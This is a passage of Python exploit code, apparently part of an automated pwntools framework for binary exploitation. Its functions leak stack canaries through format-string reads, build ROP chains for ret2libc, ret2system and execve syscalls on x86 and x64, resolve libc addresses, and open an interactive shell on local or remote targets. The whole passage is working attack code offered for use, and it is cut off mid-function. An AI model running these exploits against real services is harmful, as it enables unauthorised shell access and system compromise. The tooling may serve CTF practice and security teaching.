ret2libc exploit with canary bypass to {Colors.YELLOW}{url}:{port}{Colors.END}\")\n\t\n\tio = remote(url,port)\n\tif libc == 1:\n\t\tif libc_path == None:\n\t\t\tprint_info(\"using LibcSearcher for libc resolution\")\n\t\telse:\t\n\t\t\tprint_info(\"using user specified libc path\")\n\t\t\tlibc = ELF(libc_path)\n\telse:\n\t\tlibc = ELF(libc)\n\te = ELF(program)\n\tmain_addr = e.symbols['main']\n\tputs_plt = e.symbols['puts']\n\tputs_got = e.got['puts']\n\n\tprint_info(f\"leaking canary value at position {Colors.YELLOW}{c}{Colors.END}\")\n\tio.recv()\n\tio.sendline(f'%{c}$p'.encode())\n\tresult = io.recvline().decode().strip()\n\tprint_success(f\"canary value: {Colors.YELLOW}{result}{Colors.END}\")\n\tresult = int(result, 16)\n\tcanary = p32(result)\n\n\tprint_info(\"constructing stage 1 payload to leak puts address\")\n\tpayload1 = flat([asm('nop') * padding , canary , b'AAAA' * diff , p32(puts_plt) , p32(main_addr) , p32(puts_got)])\n\tio.recv()\n\tio.sendline(payload1)\n\n\tputs_addr=u32(io.recvuntil(b'\\xf7')[-4:])\n\tprint_success(f\"puts function address in libc: {Colors.YELLOW}{hex(puts_addr)}{Colors.END}\")\n\n\tprint_info(\"calculating libc base and target addresses\")\n\tif libc == 1:\n\t\tlibc = LibcSearcher(\"puts\",puts_addr)\n\t\tlibcbase = puts_addr - libc.dump('puts')\n\t\tlibc_system = libc.dump('system')\n\t\tlibc_sh = libc.dump('str_bin_sh')\n\t\tsystem_addr = libcbase + libc_system\n\t\tprint_success(f\"system function address in libc: {Colors.YELLOW}{hex(system_addr)}{Colors.END}\")\n\t\tsh_addr = libcbase + libc_sh\n\t\tprint_success(f\"/bin/sh string address in libc: {Colors.YELLOW}{hex(sh_addr)}{Colors.END}\")\n\telse:\n\t\tlibc_puts = libc.symbols['puts']\n\t\tlibc_system = libc.symbols['system']\n\t\tlibc_sh = next(libc.search(b'/bin/sh'))\n\t\tsystem_addr = puts_addr - libc_puts + libc_system\n\t\tprint_success(f\"system function address in libc: {Colors.YELLOW}{hex(system_addr)}{Colors.END}\")\n\t\tsh_addr = puts_addr - libc_puts + libc_sh\n\t\tprint_success(f\"/bin/sh string address in libc: {Colors.YELLOW}{hex(sh_addr)}{Colors.END}\")\n\n\tprint_info(\"re-leaking canary for stage 2 exploit\")\n\tio.recv()\n\tio.sendline(f'%{c}$p'.encode())\n\tio.recv()\n\tprint_info(\"constructing stage 2 payload for system call\")\n\tpayload2 = flat([asm('nop') * padding , canary , b'AAAA' * diff , p32(system_addr) , p32(0) , p32(sh_addr)])\n\tio.sendline(payload2)\n\tprint_critical(\"EXPLOITATION SUCCESSFUL! Dropping to shell...\")\n\tio.interactive()\n\ndef ret2libc_put_canary_x64(program,libc,pop_rdi_addr, pop_rsi_addr, ret_addr ,other_rdi_registers ,other_rsi_registers,libc_path,padding,c,diff):\n\tio = process(program)\n\tif libc == 1:\n\t\tif libc_path == None:\n\t\t\tprint_info('Using LibcSearcher')\n\t\telse:\t\n\t\t\tprint_warning('User did not specify libc path')\n\t\t\tlibc = ELF(libc_path)\n\telse:\n\t\tlibc = ELF(libc)\n\te = ELF(program)\n\tmain_addr = e.symbols['main']\n\tputs_plt = e.symbols['puts']\n\tputs_got = e.got['puts']\n\n\tpop_rdi_addr = int(pop_rdi_addr, 16)\n\tpop_rdi_addr = p64(pop_rdi_addr)\n\tio.recv()\n\tio.sendline(f'%{c}$p'.encode())\n\tresult = io.recvline().decode().strip()\n\tprint(f\"Canary value is: {result}\")\n\tresult = int(result, 16)\n\tcanary = p64(result)\n\n\tpayload1 = flat([asm('nop') * padding , canary , b'AAAAAAAA' * diff , pop_rdi_addr , p64(puts_got), p64(puts_plt) , p64(main_addr)])\n\tio.recv()\n\tio.sendline(payload1)\n\n\tputs_addr=u64(io.recvuntil(b'\\x7f')[-6:].ljust(8,b'\\x00'))\n\tprint(f'[*]puts function address in libc: \\033[31m{hex(puts_addr)}\\033[0m')\n\n\tif libc == 1:\n\t\tlibc = LibcSearcher(\"puts\",puts_addr)\n\t\tlibcbase = puts_addr - libc.dump('puts')\n\t\tlibc_system = libc.dump('system')\n\t\tlibc_sh = libc.dump('str_bin_sh')\n\t\tsystem_addr = libcbase + libc_system\n\t\tprint(f'[*]system function address in libc: \\033[31m{hex(system_addr)}\\033[0m')\n\t\tsh_addr = libcbase + libc_sh\n\t\tprint(f'[*]/bin/sh string address in libc: \\033[31m{hex(sh_addr)}\\033[0m')\n\t\tprint('\\033[31m[*]PWN!!!\\033[0m')\n\telse:\n\t\tlibc_puts = libc.symbols['puts']\n\t\tlibc_system = libc.symbols['system']\n\t\tlibc_sh = next(libc.search(b'/bin/sh'))\n\t\tsystem_addr = puts_addr - libc_puts + libc_system\n\t\tprint(f'[*]system function address in libc: \\033[31m{hex(system_addr)}\\033[0m')\n\t\tsh_addr = puts_addr - libc_puts + libc_sh\n\t\tprint(f'[*]/bin/sh string address in libc: \\033[31m{hex(sh_addr)}\\033[0m')\n\t\tprint('\\033[31m[*]PWN!!!\\033[0m')\n\n\tio.recv()\n\tio.sendline(f'%{c}$p'.encode())\n\tio.recv()\n\tret_addr = int(ret_addr, 16)\n\tret_addr = p64(ret_addr)\n\tif other_rdi_registers == 1:\n\t\tpayload2 = flat([asm('nop') * padding , canary , b'AAAAAAAA' * diff , pop_rdi_addr , p64(sh_addr), p64(0),ret_addr, p64(system_addr) , p64(0)])\n\telse:\n\t\tpayload2 = flat([asm('nop') * padding , canary , b'AAAAAAAA' * diff , pop_rdi_addr , p64(sh_addr) ,ret_addr,p64(system_addr)])\n\tio.sendline(payload2)\n\tio.interactive()\n\ndef ret2libc_put_x64_canary_remote(program,libc,padding,pop_rdi_addr, pop_rsi_addr, ret_addr ,other_rdi_registers ,other_rsi_registers,url,port,c,diff):\n\tio = remote(url,port)\n\tif libc == 1:\n\t\tif libc_path == None:\n\t\t\tprint('[*]Using LibcSearcher')\n\t\telse:\t\n\t\t\tprint('[*]User did not specify libc path')\n\t\t\tlibc = ELF(libc_path)\n\telse:\n\t\tlibc = ELF(libc)\n\te = ELF(program)\n\tmain_addr = e.symbols['main']\n\tputs_plt = e.symbols['puts']\n\tputs_got = e.got['puts']\n\n\tpop_rdi_addr = int(pop_rdi_addr, 16)\n\tpop_rdi_addr = p64(pop_rdi_addr)\n\tio.recv()\n\tio.sendline(f'%{c}$p'.encode())\n\tresult = io.recvline().decode().strip()\n\tprint(f\"Canary value is: {result}\")\n\tresult = int(result, 16)\n\tcanary = p64(result)\n\n\tpayload1 = flat([asm('nop') * padding , canary , b'AAAAAAAA' * diff , pop_rdi_addr , p64(puts_got), p64(puts_plt) , p64(main_addr)])\n\tio.recv()\n\tio.sendline(payload1)\n\n\tputs_addr=u64(io.recvuntil(b'\\x7f')[-6:].ljust(8,b'\\x00'))\n\tprint(f'[*]puts function address in libc: \\033[31m{hex(puts_addr)}\\033[0m')\n\n\tif libc == 1:\n\t\tlibc = LibcSearcher(\"puts\",puts_addr)\n\t\tlibcbase = puts_addr - libc.dump('puts')\n\t\tlibc_system = libc.dump('system')\n\t\tlibc_sh = libc.dump('str_bin_sh')\n\t\tsystem_addr = libcbase + libc_system\n\t\tprint(f'[*]system function address in libc: \\033[31m{hex(system_addr)}\\033[0m')\n\t\tsh_addr = libcbase + libc_sh\n\t\tprint(f'[*]/bin/sh string address in libc: \\033[31m{hex(sh_addr)}\\033[0m')\n\t\tprint('\\033[31m[*]PWN!!!\\033[0m')\n\telse:\n\t\tlibc_puts = libc.symbols['puts']\n\t\tlibc_system = libc.symbols['system']\n\t\tlibc_sh = next(libc.search(b'/bin/sh'))\n\t\tsystem_addr = puts_addr - libc_puts + libc_system\n\t\tprint(f'[*]system function address in libc: \\033[31m{hex(system_addr)}\\033[0m')\n\t\tsh_addr = puts_addr - libc_puts + libc_sh\n\t\tprint(f'[*]/bin/sh string address in libc: \\033[31m{hex(sh_addr)}\\033[0m')\n\t\tprint('\\033[31m[*]PWN!!!\\033[0m')\n\n\tio.recv()\n\tio.sendline(f'%{c}$p'.encode())\n\tio.recv()\n\tret_addr = int(ret_addr, 16)\n\tret_addr = p64(ret_addr)\n\tif other_rdi_registers == 1:\n\t\tpayload2 = flat([asm('nop') * padding , canary , b'AAAAAAAA' * diff , pop_rdi_addr , p64(sh_addr), p64(0),ret_addr, p64(system_addr) , p64(0)])\n\telse:\n\t\tpayload2 = flat([asm('nop') * padding , canary , b'AAAAAAAA' * diff , pop_rdi_addr , p64(sh_addr) ,ret_addr,p64(system_addr)])\n\tio.sendline(payload2)\n\tio.interactive()\n\ndef ret2libc_write_canary_x32(program,libc,padding,libc_path,c,diff):\n\tio = process(program)\n\tif libc == 1:\n\t\tif libc_path == None:\n\t\t\tprint('[*]Using LibcSearcher')\n\t\telse:\t\n\t\t\tprint('[*]User did not specify libc path')\n\t\t\tlibc = ELF(libc_path)\n\telse:\n\t\tlibc = ELF(libc)\n\te = ELF(program)\n\tmain_addr = e.symbols['main']\n\twrite_plt = e.symbols['write']\n\twrite_got = e.got['write']\n\n\tio.recv()\n\tio.sendline(f'%{c}$p'.encode())\n\tresult = io.recvline().decode().strip()\n\tprint(f\"Canary value is: {result}\")\n\tresult = int(result, 16)\n\tcanary = p32(result)\n\n\tpayload1 = flat([asm('nop') * padding , canary , b'AAAA' * diff , p32(write_plt) , p32(main_addr) , p32(1) , p32(write_got) , p32(4)])\n\tio.recv()\n\tio.sendline(payload1)\n\n\twrite_addr = u32(io.recv(4))\n\tprint(f'[*]write function address in libc: \\033[31m{hex(write_addr)}\\033[0m')\n\n\tif libc == 1:\n\t\tlibc = LibcSearcher(\"write\",write_addr)\n\t\tlibcbase = write_addr - libc.dump('write')\n\t\tlibc_system = libc.dump('system')\n\t\tlibc_sh = libc.dump('str_bin_sh')\n\t\tsystem_addr = libcbase + libc_system\n\t\tprint(f'[*]system function address in libc: \\033[31m{hex(system_addr)}\\033[0m')\n\t\tsh_addr = libcbase + libc_sh\n\t\tprint(f'[*]/bin/sh string address in libc: \\033[31m{hex(sh_addr)}\\033[0m')\n\t\tprint('\\033[31m[*]PWN!!!\\033[0m')\n\telse:\n\t\tlibc_write = libc.symbols['write']\n\t\tlibc_system = libc.symbols['system']\n\t\tlibc_sh = next(libc.search(b'/bin/sh'))\n\t\tsystem_addr = write_addr - libc_write + libc_system\n\t\tprint(f'[*]system function address in libc: \\033[31m{hex(system_addr)}\\033[0m')\n\t\tsh_addr = write_addr - libc_write + libc_sh\n\t\tprint(f'[*]/bin/sh string address in libc: \\033[31m{hex(sh_addr)}\\033[0m')\n\t\tprint('\\033[31m[*]PWN!!!\\033[0m')\n\n\tio.recv()\n\tio.sendline(f'%{c}$p'.encode())\n\tio.recv()\n\tpayload2 = flat([asm('nop') * padding , canary , b'AAAA' * diff, p32(system_addr) , p32(0) , p32(sh_addr)])\n\tio.recv()\n\tio.sendline(payload2)\n\tio.interactive()\n\ndef ret2libc_write_canary_x64(program,libc,padding,pop_rdi_addr, pop_rsi_addr, ret_addr ,other_rdi_registers ,other_rsi_registers,libc_path,c,diff):\n\tio = process(program)\n\tif libc == 1:\n\t\tif libc_path == None:\n\t\t\tprint('[*]Using LibcSearcher')\n\t\telse:\t\n\t\t\tprint('[*]User did not specify libc path')\n\t\t\tlibc = ELF(libc_path)\n\telse:\n\t\tlibc = ELF(libc)\n\te = ELF(program)\n\tmain_addr = e.symbols['main']\n\twrite_plt = e.symbols['write']\n\twrite_got = e.got['write']\n\tif other_rsi_registers == 1:\n\t\tpop_rdi_addr = int(pop_rdi_addr, 16)\n\t\tpop_rdi_addr = p64(pop_rdi_addr)\n\t\tpop_rsi_addr = int(pop_rsi_addr, 16)\n\t\tpop_rsi_addr = p64(pop_rsi_addr)\n\n\t\tio.recv()\n\t\tio.sendline(f'%{c}$p'.encode())\n\t\tresult = io.recvline().decode().strip()\n\t\tprint(f\"Canary value is: {result}\")\n\t\tresult = int(result, 16)\n\t\tcanary = p64(result)\n\n\t\tpayload1 = flat([asm('nop') * padding , canary , b'AAAAAAAA' * diff ,pop_rdi_addr , p64(1) , pop_rsi_addr , p64(write_got) , p64(0) , p64(write_plt) , p64(main_addr)])\n\t\tio.recv()\n\t\tio.sendline(payload1)\n\n\telif other_rdi_registers == 1:\n\t\tpop_rdi_addr = int(pop_rdi_addr, 16)\n\t\tpop_rdi_addr = p64(pop_rdi_addr)\n\t\tpop_rsi_addr = int(pop_rsi_addr, 16)\n\t\tpop_rsi_addr = p64(pop_rsi_addr)\n\n\t\tio.recv()\n\t\tio.sendline(f'%{c}$p'.encode())\n\t\tresult = io.recvline().decode().strip()\n\t\tprint(f\"Canary value is: {result}\")\n\t\tresult = int(result, 16)\n\t\tcanary = p64(result)\n\n\t\tpayload1 = flat([asm('nop') * padding , canary , b\"AAAAAAAA\" * diff , pop_rdi_addr , p64(1) , p64(0), pop_rsi_addr , p64(write_got) , p64(write_plt) , p64(main_addr)])\n\t\tio.recv()\n\t\tio.sendline(payload1)\n\n\telif other_rdi_registers == 0 and other_rsi_registers == 0:\n\t\tpop_rdi_addr = int(pop_rdi_addr, 16)\n\t\tpop_rdi_addr = p64(pop_rdi_addr)\n\t\tpop_rsi_addr = int(pop_rsi_addr, 16)\n\t\tpop_rsi_addr = p64(pop_rsi_addr)\n\n\t\tio.recv()\n\t\tio.sendline(f'%{c}$p'.encode())\n\t\tresult = io.recvline().decode().strip()\n\t\tprint(f\"Canary value is: {result}\")\n\t\tresult = int(result, 16)\n\t\tcanary = p64(result)\n\n\t\tpayload1 = flat([asm('nop') * padding , pop_rdi_addr , p64(1) , pop_rsi_addr , p64(write_got) , p64(write_plt) , p64(main_addr)])\n\t\tio.recv()\n\t\tio.sendline(payload1)\n\n\twrite_addr = u64(io.recv(8))\n\tprint(f'[*]write function address in libc: \\033[31m{hex(write_addr)}\\033[0m')\n\n\tif libc == 1:\n\t\tlibc = LibcSearcher(\"write\",write_addr)\n\t\tlibcbase = write_addr - libc.dump('write')\n\t\tlibc_system = libc.dump('system')\n\t\tlibc_sh = libc.dump('str_bin_sh')\n\t\tsystem_addr = libcbase + libc_system\n\t\tprint(f'[*]system function address in libc: \\033[31m{hex(system_addr)}\\033[0m')\n\t\tsh_addr = libcbase + libc_sh\n\t\tprint(f'[*]/bin/sh string address in libc: \\033[31m{hex(sh_addr)}\\033[0m')\n\t\tprint('\\033[31m[*]PWN!!!\\033[0m')\n\telse:\n\t\tlibc_write = libc.symbols['write']\n\t\tlibc_system = libc.symbols['system']\n\t\tlibc_sh = next(libc.search(b'/bin/sh'))\n\t\tsystem_addr = write_addr - libc_write + libc_system\n\t\tprint(f'[*]system function address in libc: \\033[31m{hex(system_addr)}\\033[0m')\n\t\tsh_addr = write_addr - libc_write + libc_sh\n\t\tprint(f'[*]/bin/sh string address in libc: \\033[31m{hex(sh_addr)}\\033[0m')\n\t\tprint('\\033[31m[*]PWN!!!\\033[0m')\n\n\tio.recv()\n\tio.sendline(f'%{c}$p'.encode())\n\n\tio.recv()\n\n\tif other_rdi_registers == 1:\n\t\tpayload2 = flat([asm('nop') * padding ,canary , b\"AAAAAAAA\" * diff , pop_rdi_addr , p64(sh_addr), p64(0), p64(system_addr) , p64(0)])\n\telse:\n\t\tpayload2 = flat([asm('nop') * padding , canary , b\"AAAAAAAA\" * diff, pop_rdi_addr , p64(sh_addr) ,p64(system_addr) , p64(0)])\n\tio.recv()\n\tio.sendline(payload2)\n\tio.interactive()\n\ndef ret2_system_canary_x32(program, libc, padding, libc_path, c, diff):\n\tio = process(program)\n\te = ELF(program)\n\tsystem_addr = e.symbols['system']\n\tprint(f'[*]system function address in program: \\033[31m{hex(system_addr)}\\033[0m')\n\tbin_sh_addr = next(e.search(b'/bin/sh'))\n\tprint(f'[*]/bin/sh string address in program: \\033[31m{hex(bin_sh_addr)}\\033[0m')\n\tprint('\\033[31m[*]PWN!!!\\033[0m')\n\tio.recv()\n\tio.sendline(f'%{c}$p'.encode())\n\tresult = io.recvline().decode().strip()\n\tprint(f\"Canary value is: {result}\")\n\tresult = int(result, 16)\n\tcanary = p32(result)\n\n\tpayload = flat([asm('nop') * padding, canary, b\"AAAA\" * diff, p32(system_addr), p32(0), p32(bin_sh_addr)])\n\tio.sendline(payload)\n\tio.interactive()\n\ndef ret2_system_canary_x64(program, libc, padding, pop_rdi_addr, other_rdi_registers, ret_addr, libc_path, c, diff):\n\tif pop_rdi_addr == None:\n\t\tprint(\"pop rdi instruction does not exist, cannot exploit\")\n\t\tsys.exit(0)\n\tio = process(program)\n\te = ELF(program)\n\tsystem_addr = e.symbols['system']\n\tprint(f'[*]system function address in program: \\033[31m{hex(system_addr)}\\033[0m')\n\tbin_sh_addr = next(e.search(b'/bin/sh'))\n\tprint(f'[*]/bin/sh string address in program: \\033[31m{hex(bin_sh_addr)}\\033[0m')\n\tprint('\\033[31m[*]PWN!!!\\033[0m')\n\tio.recv()\n\tio.sendline(f'%{c}$p'.encode())\n\tresult = io.recvline().decode().strip()\n\tprint(f\"canary value is: {result}\")\n\tresult = int(result, 16)\n\tcanary = p64(result)\n\n\tpop_rdi_addr = int(pop_rdi_addr, 16)\n\tpop_rdi_addr = p64(pop_rdi_addr)\n\tret_addr = int(ret_addr, 16)\n\tret_addr = p64(ret_addr)\n\n\tif other_rdi_registers == 1:\n\t\tpayload = flat([asm('nop') * padding ,canary , b\"AAAAAAAA\" * diff, pop_rdi_addr , p64(bin_sh_addr), p64(0),ret_addr, p64(system_addr) , p64(0)])\n\telif other_rdi_registers == 0:\n\t\tpayload = flat([asm('nop') * padding , canary , b\"AAAAAAAA\" * diff, pop_rdi_addr , p64(bin_sh_addr), ret_addr,p64(system_addr)])\n\tio.sendline(payload)\n\tio.interactive()\n\ndef execve_canary_syscall(program, padding, pop_eax_addr, pop_ebx_addr, pop_ecx_addr, pop_edx_addr, pop_ecx_ebx_addr, ret_addr, int_0x80, c, diff):\n\tif pop_ecx_addr == None:\n\t\tio = process(program)\n\t\te = ELF(program)\n\t\tbin_sh_addr = next(e.search(b'/bin/sh'))\n\t\tprint(f'[*]/bin/sh string address in program: \\033[31m{hex(bin_sh_addr)}\\033[0m')\n\t\tpop_eax_addr = int(pop_eax_addr, 16)\n\t\tpop_eax_addr = p32(pop_eax_addr)\n\t\tpop_ecx_ebx_addr = int(pop_ecx_ebx_addr, 16)\n\t\tpop_ecx_ebx_addr = p32(pop_ecx_ebx_addr)\n\t\tpop_edx_addr = int(pop_edx_addr, 16)\n\t\tpop_edx_addr = p32(pop_edx_addr)\n\t\tint_0x80 = int(int_0x80, 16)\n\t\tint_0x80 = p32(int_0x80)\n\n\t\tio.recv()\n\t\tio.sendline(f'%{c}$p'.encode())\n\t\tresult = io.recvline().decode().strip()\n\t\tprint(f\"canary value is: {result}\")\n\t\tresult = int(result, 16)\n\t\tcanary = p32(result)\n\n\t\tpayload = flat([asm('nop') * padding, canary, b\"AAAA\" * diff, pop_eax_addr, 0xb, pop_ecx_ebx_addr, 0, bin_sh_addr, pop_edx_addr, 0, int_0x80])\n\t\tio.recv()\n\t\tio.sendline(payload)\n\t\tprint('\\033[31m[*]PWN!!!\\033[0m')\n\t\tio.interactive()\n\telse:\n\t\tio = process(program)\n\t\te = ELF(program)\n\t\tbin_sh_addr = next(e.search(b'/bin/sh'))\n\t\tprint(f'[*]/bin/sh string address in program: \\033[31m{hex(bin_sh_addr)}\\033[0m')\n\t\tpop_eax_addr = int(pop_eax_addr, 16)\n\t\tpop_eax_addr = p32(pop_eax_addr)\n\t\tpop_ecx_addr = int(pop_ecx_addr, 16)\n\t\tpop_ecx_addr = p32(pop_ecx_addr)\n\t\tpop_ebx_addr = int(pop_ebx_addr, 16)\n\t\tpop_ebx_addr = p32(pop_ebx_addr)\n\t\tpop_edx_addr = int(pop_edx_addr, 16)\n\t\tpop_edx_addr = p32(pop_edx_addr)\n\t\tint_0x80 = int(int_0x80, 16)\n\t\tint_0x80 = p32(int_0x80)\n\n\t\tio.recv()\n\t\tio.sendline(f'%{c}$p'.encode())\n\t\tresult = io.recvline().decode().strip()\n\t\tprint(f\"canary value is: {result}\")\n\t\tresult = int(result, 16)\n\t\tcanary = p32(result)\n\n\t\tpayload = flat([asm('nop') * padding, canary, b\"AAAA\" * diff, pop_eax_addr, 0xb, pop_ebx_addr, bin_sh_addr, pop_ecx_addr, 0, pop_edx_addr, 0, int_0x80])\n\t\tio.recv()\n\t\tio.sendline(payload)\n\t\tprint('\\033[31m[*]PWN!!!\\033[0m')\n\t\tio.interactive()\n\ndef ret2libc_write_x32_canary_remote(program,libc,padding,url,port,c,diff):\n\tio = remote(url,port)\n\tif libc == 1:\n\t\tif libc_path == None:\n\t\t\tprint('[*]Using LibcSearcher')\n\t\telse:\t\n\t\t\tprint('[*]User did not specify libc path')\n\t\t\tlibc = ELF(libc_path)\n\telse:\n\t\tlibc = ELF(libc)\n\te = ELF(program)\n\tmain_addr = e.symbols['main']\n\twrite_plt = e.symbols['write']\n\twrite_got = e.got['write']\n\n\tio.recv()\n\tio.sendline(f'%{c}$p'.encode())\n\tresult = io.recvline().decode().strip()\n\tprint(f\"Canary value is: {result}\")\n\tresult = int(result, 16)\n\tcanary = p32(result)\n\n\tpayload1 = flat([asm('nop') * padding , canary , b'AAAA' * diff , p32(write_plt) , p32(main_addr) , p32(1) , p32(write_got) , p32(4)])\n\tio.recv()\n\tio.sendline(payload1)\n\n\twrite_addr = u32(io.recv(4))\n\tprint(f'[*]write function address in libc: \\033[31m{hex(write_addr)}\\033[0m')\n\n\tif libc == 1:\n\t\tlibc = LibcSearcher(\"write\",write_addr)\n\t\tlibcbase = write_addr - libc.dump('write')\n\t\tlibc_system = libc.dump('system')\n\t\tlibc_sh = libc.dump('str_bin_sh')\n\t\tsystem_addr = libcbase + libc_system\n\t\tprint(f'[*]system function address in libc: \\033[31m{hex(system_addr)}\\033[0m')\n\t\tsh_addr = libcbase + libc_sh\n\t\tprint(f'[*]/bin/sh string address in libc: \\033[31m{hex(sh_addr)}\\033[0m')\n\t\tprint('\\033[31m[*]PWN!!!\\033[0m')\n\telse:\n\t\tlibc_write = libc.symbols['write']\n\t\tlibc_system = libc.symbols['system']\n\t\tlibc_sh = next(libc.search(b'/bin/sh'))\n\t\tsystem_addr = write_addr - libc_write + libc_system\n\t\tprint(f'[*]system function address in libc: \\033[31m{hex(system_addr)}\\033[0m')\n\t\tsh_addr = write_addr - libc_write + libc_sh\n\t\tprint(f'[*]/bin/sh string address in libc: \\033[31m{hex(sh_addr)}\\033[0m')\n\t\tprint('\\033[31m[*]PWN!!!\\033[0m')\n\n\tio.recv()\n\tio.sendline(f'%{c}$p'.encode())\n\n\tio.recv()\n\n\tpayload2 = flat([asm('nop') * padding , canary , b'AAAA' * diff, p32(system_addr) , p32(0) , p32(sh_addr)])\n\tio.recv()\n\tio.sendline(payload2)\n\tio.interactive()\n\ndef ret2libc_write_x64_canary_remote(program, libc, padding, pop_rdi_addr, pop_rsi_addr, ret_addr, other_rdi_registers, other_rsi_registers, url, port, c, diff):\n\tio = remote(url, port)\n\tif libc == 1:\n\t\tif libc_path == None:\n\t\t\tprint('[*]Using LibcSearcher')\n\t\telse:\t\n\t\t\tprint('[*]User did not specify libc path')\n\t\t\tlibc = ELF(libc_path)\n\telse:\n\t\tlibc = ELF(libc)\n\te = ELF(program)\n\tmain_addr = e.symbols['main']\n\twrite_plt = e.symbols['write']\n\twrite_got = e.got['write']\n\tif other_rsi_registers == 1:\n\t\tpop_rdi_addr = int(pop_rdi_addr, 16)\n\t\tpop_rdi_addr = p64(pop_rdi_addr)\n\t\tpop_rsi_addr = int(pop_rsi_addr, 16)\n\t\tpop_rsi_addr = p64(pop_rsi_addr)\n\n\t\tio.recv()\n\t\tio.sendline(f'%{c}$p'.encode())\n\t\tresult = io.recvline().decode().strip()\n\t\tprint(f\"Canary value is: {result}\")\n\t\tresult = int(result, 16)\n\t\tcanary = p64(result)\n\n\t\tpayload1 = flat([asm('nop') * padding, canary, b'AAAAAAAA' * diff, pop_rdi_addr, p64(1), pop_rsi_addr, p64(write_got), p64(0), p64(write_plt), p64(main_addr)])\n\t\tio.recv()\n\t\tio.sendline(payload1)\n\n\telif other_rdi_registers == 1:\n\t\tpop_rdi_addr = int(pop_rdi_addr, 16)\n\t\tpop_rdi_addr = p64(pop_rdi_addr)\n\t\tpop_rsi_addr = int(pop_rsi_addr, 16)\n\t\tpop_rsi_addr = p64(pop_rsi_addr)\n\n\t\tio.recv()\n\t\tio.sendline(f'%{c}$p'.encode())\n\t\tresult = io.recvline().decode().strip()\n\t\tprint(f\"Canary value is: {result}\")\n\t\tresult = int(result, 16)\n\t\tcanary = p64(result)\n\n\t\tpayload1 = flat([asm('nop') * padding, canary, b\"AAAAAAAA\" * diff, pop_rdi_addr, p64(1), p64(0), pop_rsi_addr, p64(write_got), p64(write_plt), p64(main_addr)])\n\t\tio.recv()\n\t\tio.sendline(payload1)\n\n\telif other_rdi_registers == 0 and other_rsi_registers == 0:\n\t\tpop_rdi_addr = int(pop_rdi_addr, 16)\n\t\tpop_rdi_addr = p64(pop_rdi_addr)\n\t\tpop_rsi_addr = int(pop_rsi_addr, 16)\n\t\tpop_rsi_addr = p64(pop_rsi_addr)\n\n\t\tio.recv()\n\t\tio.sendline(f'%{c}$p'.encode())\n\t\tresult = io.recvline().decode().strip()\n\t\tprint(f\"Canary value is: {result}\")\n\t\tresult = int(result, 16)\n\t\tcanary = p64(result)\n\n\t\tpayload1 = flat([asm('nop') * padding, canary, b\"AAAAAAAA\" * diff, pop_rdi_addr, p64(1), pop_rsi_addr, p64(write_got), p64(write_plt), p64(main_addr)])\n\t\tio.recv()\n\t\tio.sendline(payload1)\n\n\twrite_addr = u64(io.recv(8))\n\tprint(f'[*]write function address in libc: \\033[31m{hex(write_addr)}\\033[0m')\n\n\tif libc == 1:\n\t\tlibc = LibcSearcher(\"write\", write_addr)\n\t\tlibcbase = write_addr - libc.dump('write')\n\t\tlibc_system = libc.dump('system')\n\t\tlibc_sh = libc.dump('str_bin_sh')\n\t\tsystem_addr = libcbase + libc_system\n\t\tprint(f'[*]system function address in libc: \\033[31m{hex(system_addr)}\\033[0m')\n\t\tsh_addr = libcbase + libc_sh\n\t\tprint(f'[*]/bin/sh string address in libc: \\033[31m{hex(sh_addr)}\\033[0m')\n\t\tprint('\\033[31m[*]PWN!!!\\033[0m')\n\telse:\n\t\tlibc_write = libc.symbols['write']\n\t\tlibc_system = libc.symbols['system']\n\t\tlibc_sh = next(libc.search(b'/bin/sh'))\n\t\tsystem_addr = write_addr - libc_write + libc_system\n\t\tprint(f'[*]system function address in libc: \\033[31m{hex(system_addr)}\\033[0m')\n\t\tsh_addr = write_addr - libc_write + libc_sh\n\t\tprint(f'[*]/bin/sh string address in libc: \\033[31m{hex(sh_addr)}\\033[0m')\n\t\tprint('\\033[31m[*]PWN!!!\\033[0m')\n\n\tio.recv()\n\tio.sendline(f'%{c}$p'.encode())\n\tresult = io.recvline().decode().strip()\n\tresult = int(result, 16)\n\tcanary = p64(result)\n\n\tret_addr = int(ret_addr, 16)\n\tret_addr = p64(ret_addr)\n\n\tif other_rdi_registers == 1:\n\t\tpayload2 = flat([asm('nop') * padding, canary, b\"AAAAAAAA\" * diff, pop_rdi_addr, p64(sh_addr), p64(0), ret_addr, p64(system_addr), p64(0)])\n\telif other_rdi_registers == 0:\n\t\tpayload2 = flat([asm('nop') * padding, canary, b\"AAAAAAAA\" * diff, pop_rdi_addr, p64(sh_addr), ret_addr, p64(system_addr)])\n\n\tio.recv()\n\tio.sendline(payload2)\n\tio.interactive()\n\ndef ret2_system_x32_canary_remote(program, libc, padding, url, port, c, diff):\n\tio = remote(url, port)\n\te = ELF(program)\n\tsystem_addr = e.symbols['system']\n\tprint(f'[*]system function address in program: \\033[31m{hex(system_addr)}\\033[0m')\n\tbin_sh_addr = next(e.search(b'/bin/sh'))\n\tprint(f'[*]/bin/sh string address in program: \\033[31m{hex(bin_sh_addr)}\\033[0m')\n\tprint('\\033[31m[*]PWN!!!\\033[0m')\n\tio.recv()\n\tio.sendline(f'%{c}$p'.encode())\n\tresult = io.recvline().decode().strip()\n\tprint(f\"canary value is: {result}\")\n\tresult = int(result, 16)\n\tcanary = p32(result)\n\n\tpayload = flat([asm('nop') * padding, canary, b\"AAAA\" * diff, p32(system_addr), p32(0), p32(bin_sh_addr)])\n\tio.sendline(payload)\n\tio.interactive()\n\ndef ret2_system_x64_canary_remote(program, libc, padding, pop_rdi_addr, other_rdi_registers, ret_addr, url, port, c, diff):\n\tif pop_rdi_addr == None:\n\t\tprint(\"pop rdi instruction does not exist, cannot exploit\")\n\t\tsys.exit(0)\n\tio = remote(url, port)\n\te = ELF(program)\n\tsystem_addr = e.symbols['system']\n\tprint(f'[*]system function address in program: \\033[31m{hex(system_addr)}\\033[0m')\n\tbin_sh_addr = next(e.search(b'/bin/sh'))\n\tprint(f'[*]/bin/sh string address in program: \\033[31m{hex(bin_sh_addr)}\\033[0m')\n\tprint('\\033[31m[*]PWN!!!\\033[0m')\n\tio.recv()\n\tio.sendline(f'%{c}$p'.encode())\n\tresult = io.recvline().decode().strip()\n\tprint(f\"canary value is: {result}\")\n\tresult = int(result, 16)\n\tcanary = p64(result)\n\n\tpop_rdi_addr = int(pop_rdi_addr, 16)\n\tpop_rdi_addr = p64(pop_rdi_addr)\n\tret_addr = int(ret_addr, 16)\n\tret_addr = p64(ret_addr)\n\n\tif other_rdi_registers == 1:\n\t\tpayload = flat([asm('nop') * padding, canary, b\"AAAAAAAA\" * diff, pop_rdi_addr, p64(bin_sh_addr), p64(0), ret_addr, p64(system_addr), 